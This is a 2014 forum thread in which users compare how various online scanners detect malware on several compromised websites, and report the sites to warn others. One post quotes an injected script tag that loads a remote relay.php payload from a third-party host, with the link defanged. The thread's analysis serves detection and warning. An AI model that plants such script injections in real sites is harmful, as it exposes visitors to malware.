Lots of scanners miss detection

polonus · 2014-07-19T23:24:15.000Z

See: http://killmalware.com/dm-ural.ru/#
Missed completely: http://app.webinspector.com/public/reports/23210016
also here: https://www.virustotal.com/nl/url/2499901a18de308c4231beb3e5ba30dc9d6ed094f823f4e40d8e65c7aa402ae4/analysis/1405811732/
and here: http://www.urlvoid.com/scan/dm-ural.ru/ :o
Sucuri has decent detection: http://sitecheck.sucuri.net/results/www.dm-ural.ru/
Malware Detected Critical
Quttera flags: index
Severity: Suspicious
Reason: Detected suspicious redirection to external web resources at HTTP level.
Details: Detected HTTP redirection to http://bitly.com/STTMlN.
File size[byte]: 0
File type: Unknown
MD5: 00000000000000000000000000000000
Scan duration[sec]: 0.001000

pol

polonus · 2014-07-20T12:20:25.000Z

As far as things stand now, verdict might be this is not malicious.

polonus

polonus · 2014-07-20T13:17:50.000Z

Another one, and a Yandex blacklisted site: http://killmalware.com/shutter-bug.net/
Missed completely here: http://app.webinspector.com/public/reports/23222225
Only flagged for Yandex here: https://www.virustotal.com/nl/url/f28893c254dc339fd77af4da2ec78ff899cd91626465b1999ddc49cc6e2b2c9d/analysis/1405861314/
The Javascript Check results:
Suspicious

_700x.jpg"> <!–/89
The Included Scripts Check:
Suspect - please check list for unknown includes

htxp://www.possible-it.de/includes/relay.php?id=7526825

7 malicious files found by Quttera’s: http://quttera.com/detailed_report/shutter-bug.net
Detected encoded JavaScript code commonly used to hide malicious behaviour.

 [[<!--37387a--><scripttype="text/javascript"src="htxp://www.possible-it.de/includes/relay.php?id=7526831"></script><!--/37387a-->]]

where I get a malcode attack alert.

You don’t have permission to access /includes/relay.php on this server.

Exploits can be abused for earlier versions of Joomla. Here we find: Powered by: PHP/5.4.4-14+deb7u10
Outdated Web Server Apache found: Apache/2.2.22, so vulnerable… PHP supports the ability to ‘include’ or ‘require’ additional files within a script. If unsanitized data is passed to such functions…these could often be part of SEO Spam attacks.

polonus

P.S - reported at WOT by “luntrus”.

polonus · 2014-07-20T13:49:24.000Z

Site detected but no file detection for Stealer
Flagged: http://scanurl.net/?u=capaworks.site88.net%2Fcapa%2FPHP%2F&uesb=Check+This+URL#results
Blacklisted and compromised: http://sitecheck.sucuri.net/results/capaworks.site88.net/capa/php/
→ http://www.google.com/safebrowsing/diagnostic?site=capaworks.site88.net
Connection timed out: http://urlquery.net/report.php?id=1405863838320
IP bandness history for IP: https://www.virustotal.com/nl/ip-address/31.170.162.63/information/
No file detection here: https://www.virustotal.com/nl/file/6b01029d5dbda7589180c109cee0c8d502871754a1d3bd485414163325a74be2/analysis/1405565525/

polonus

Secondmineboy · 2014-07-20T13:50:56.000Z

Might be new: First submission 2014-07-17 02:52:05 UTC ( 3 zile, 10 ore ago )
Last submission 2014-07-17 02:52:05 UTC ( 3 zile, 10 ore ago )

polonus · 2014-07-20T15:41:51.000Z

Hi Steven Winderlich,

Added here to warn users: https://www.mywot.com/en/scorecard/capaworks.site88.net#view

pol aka luntrus

Announcements